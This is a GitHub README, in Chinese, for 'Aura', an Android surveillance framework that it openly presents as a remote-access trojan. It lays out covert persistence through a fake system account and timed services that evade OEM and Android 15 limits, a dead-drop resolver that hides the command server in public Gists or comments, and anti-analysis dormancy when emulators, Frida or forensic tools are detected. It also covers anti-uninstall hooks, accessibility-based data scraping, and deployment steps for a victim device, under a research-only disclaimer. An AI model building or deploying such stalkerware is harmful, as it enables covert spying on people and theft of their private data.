Asuna0xA/Aura
GitHub: Asuna0xA/Aura
Aura 是一个针对 Android 11-15 的高阶监控框架,通过操作系统级持久化、死信箱解析及反分析技术实现隐蔽的数据同步与长期驻留。
Stars: 0 | Forks: 0
# Aura:下一代 Android 监控研究套件
[](https://github.com/Asuna0xA/Aura)
[](https://developer.android.com/about/versions/15)
[](DISCLAIMER.md)
**Aura** 是一个模块化、专业级的 Android 监控框架,专为操作系统级持久化和隐蔽性的研究而设计的概念验证。它通过实现商业标准的异步数据同步和高级黑客持久化技术,超越了传统的 RAT 模型。
## 🛡️ Aura 与商业软件(FamiGuard/VigilKids)的对比
Aura 在功能上与商业“家长控制”工具并驾齐驱,同时为现代 Android 安全提供了高级的“黑客”绕过手段。
| 功能 | FamiGuard Pro | Aura (v3.2.1) |
| :--- | :---: | :---: |
| **持久化集成** | 🟡 (基于 Service) | 🏆 **SyncAdapter + Alarm Pulse** |
| **Android 15 生存能力** | ❌ (6h 墙) | 🏆 **Pulse Strategy (Active)** |
| **OEM 规避** | ❌ (Doze/Sleep) | 🏆 **Passive Boot Delay** |
## 🏗️ 技术架构
```
graph TD
subgraph "Target Device (Victim)"
A[Android System] --> B[EnvironmentGuard]
B -- "Safe" --> C[Aura Core]
B -- "Hostile (Emulator/Frida)" --> D[Dormancy]
C --> E[SyncAdapter]
C --> F[Dead Drop Resolver]
C --> G[Accessibility Service]
G --> H[Universal Data Scraper]
G --> I[Anti-Uninstall Hook]
E -- "15m Periodic" --> J[HTTPS REST Sync]
end
subgraph "C2 Infrastructure (VPS)"
K["DDR Endpoint (Gist/Paste)"]
L[Flask API]
M[("aura.db")]
J -- "Resolved via K" --> L
L --> M
end
subgraph "Analyst View (Browser)"
N[Web Dashboard]
N -- "Real-time" --> L
end
```
## 🚀 关键创新亮点
### 1. 操作系统级持久化(大脑与肌肉)
Aura v3.2.1 引入了双层持久化模型,以在现代 OEM(Samsung、Honor)激进的“深度睡眠”启发式策略下生存。
- **大脑**:注册为虚假系统账户。这确保了应用进程被 Android `system_server` 优先对待。
- **肌肉**:每 10 分钟触发一次的周期性前台服务 (FGS),仅在必要时触发,从而绕过 Android 15 对 `dataSync` 服务每天 6 小时的聚合限制。
### 2. 死信箱解析器 (DDR)
为了防止 C2 被接管和取证发现,Aura 利用**死信箱解析器**。C2 IP 地址从未被硬编码。相反,植入程序从公共服务(如 GitHub Gist 或 Instagram 评论)获取加密字符串,在运行时解码并连接到活动的 VPS。
### 3. EnvironmentGuard(反分析)
Aura 具有“上下文感知”能力。在激活任何收集模块之前,它会运行一系列检查以检测模拟器、Frida 插桩、调试器和取证工具(Cellebrite、Drozer)。如果检测到这些工具,Aura 将进入永久的“休眠”状态以防止分析。
## 🛠️ 快速设置(仅供研究)
1. **配置 DDR**:使用 `server/ddr_helper.py` 对您的 VPS IP 进行编码,并将其托管在公开的 Gist 上。
2. **部署 C2**:在您的 VPS 上运行 Flask 服务器(推荐 Ubuntu 22.04+)。
3. **构建 APK**:在 `DeadDropResolver.java` 中配置 `DDR_URL` 并使用 Gradle 进行编译。
4. **安装**:在目标设备上授予权限(A11y + 通知)。
## 🧪 高级研究路线图
当前版本:**v3.1 (Stable)**
- [x] **Phase 3.2**:精英级稳定化(Android 15 + OEM 规避)。
- [ ] **Phase 4.0**:GhostLoader - JNI/NDK 内存驻留执行。
- [ ] **Phase 4.1**:集成 SQLCipher 以实现磁盘级取证隐形。
## ⚖️ 责任与免责声明
本项目仅用于教育目的和经授权的渗透测试。未经授权访问计算机系统是非法的。在使用此工具之前,请阅读 [DISCLAIMER.md](DISCLAIMER.md)。
标签:Android监控, DAST, Flask, JS文件枚举, OEM绕过, POC, RAT, SyncAdapter, 反取证, 命令控制, 嗅探欺骗, 域名枚举, 安全评估, 安卓11, 安卓12, 安卓13, 安卓14, 安卓15, 安卓后门, 家长控制, 异步同步, 恶意软件分析, 搜索语句(dork), 数据窃取, 数据采集, 无障碍服务, 权限维持, 概念验证, 监控框架, 目录枚举, 移动安全, 远程访问木马, 防卸载, 隐蔽性